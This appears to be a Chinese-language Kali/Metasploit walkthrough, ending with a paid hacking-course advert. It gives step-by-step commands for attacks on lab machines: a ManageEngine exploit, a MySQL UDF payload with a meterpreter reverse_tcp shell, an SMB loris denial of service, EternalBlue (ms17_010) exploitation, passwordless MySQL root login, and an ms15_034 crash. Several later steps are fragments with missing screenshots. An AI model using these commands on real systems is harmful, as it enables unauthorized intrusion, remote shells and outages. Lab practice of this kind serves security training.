1、攻擊windows服務(wù)器漏洞
用nmap對網(wǎng)段進(jìn)行掃描nmap -sP 192.168. 在進(jìn)行IP掃描
發(fā)現(xiàn)Windows服務(wù)器漏洞
步驟:
msfconsole---進(jìn)入滲透模塊
search manageengine-------搜索滲透模塊
search reverse_http---------搜索http滲透模塊
use
exploit/windows/http/manageeine_connectionid_write--------使用該滲透模塊
set rhosts 192.168.
set rport 8022
set LpORT 8080
run -----------------設(shè)置攻擊目標(biāo)地址,攻擊目標(biāo)端口,回連的端口號:
2、MySQL數(shù)據(jù)庫漏洞
nmap 192.168.-----掃描端口漏洞
步驟:
msfconsole-------進(jìn)入滲透模式
search mysql-------掃描數(shù)據(jù)庫滲透版本
use
exploit/multi/mysql/mysql_udf_payload----------使用該滲透版本進(jìn)行滲透
show options
set rhosts 192.168.--------設(shè)置攻擊端口號
set payload
windows/x64/meterpreter/reverse_tcp--------選擇該滲透方式進(jìn)行攻擊
run
3、拒絕服務(wù)攻擊漏洞:
使用nmap 192.168. 對端口號進(jìn)行掃描發(fā)現(xiàn)漏洞
步驟:
msfconsole-------進(jìn)入滲透模式
search dos/smb/smb-------搜索滲透版本
use
auxiliary/dos/smb/smb_loris-------使用該滲透版本進(jìn)行攻擊
show options--------
set rhosts 192.168.--------設(shè)置攻擊端口號
run-----滲透
4.永恒之藍(lán)漏洞復(fù)現(xiàn)
漏洞描述:
Eternalblue通過TCP端口445和139來利用SMBv1和NBT中的遠(yuǎn)程代碼執(zhí)行漏洞,惡意代碼會掃描開放445文件共享端口的Windows機(jī)器,無需用戶任何操作,只要開機(jī)上網(wǎng),不法分子就能在電腦和服務(wù)器中植入勒索軟件、遠(yuǎn)程控制木馬、虛擬貨幣挖礦機(jī)等惡意程序。
影響版本:
目前已知受影響的Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。
復(fù)現(xiàn)環(huán)境:
攻擊機(jī):Kali2020.3(IP:192.168.88.143)
靶機(jī):Metasploitable3Win2k8 (IP:192.168.88.140)
復(fù)現(xiàn)過程:
- 用nmap執(zhí)行C段掃描
2、打開MSF
在終端輸入如下命令打開MSF終端:
搜索ms17_010模塊
這里可以得到幾個工具,其中
auxiliary/scanner/smb/smb_ms17_010是永恒之藍(lán)掃描模塊,
exploit/windows/smb/ms17_010_eternalblue是永恒之藍(lán)攻擊代碼,一般配合使用,前者先掃描,若顯示有漏洞,再進(jìn)行攻擊。
執(zhí)行掃描模塊
執(zhí)行ms17_010攻擊模塊
5.MySQL弱密碼登錄:
1、在kali上執(zhí)行mysql –h 192.168.26.123 –u root
2、登錄成功,進(jìn)入MySQL系統(tǒng)
3、測試效果:
6.http(ms15_034漏洞)
進(jìn)入msf模塊
查看要設(shè)置的東西show options
設(shè)置攻擊ip
攻擊前
攻擊后,我的是藍(lán)屏1秒后,跳轉(zhuǎn)到立即重啟界面
ssh測試
開啟端口轉(zhuǎn)發(fā)
查看情況
在kali上嘗試連接(rdesktop IP)
專欄
1個月掌握Kali滲透與黑客編程
作者:Kali與編程
188幣
269人已購
查看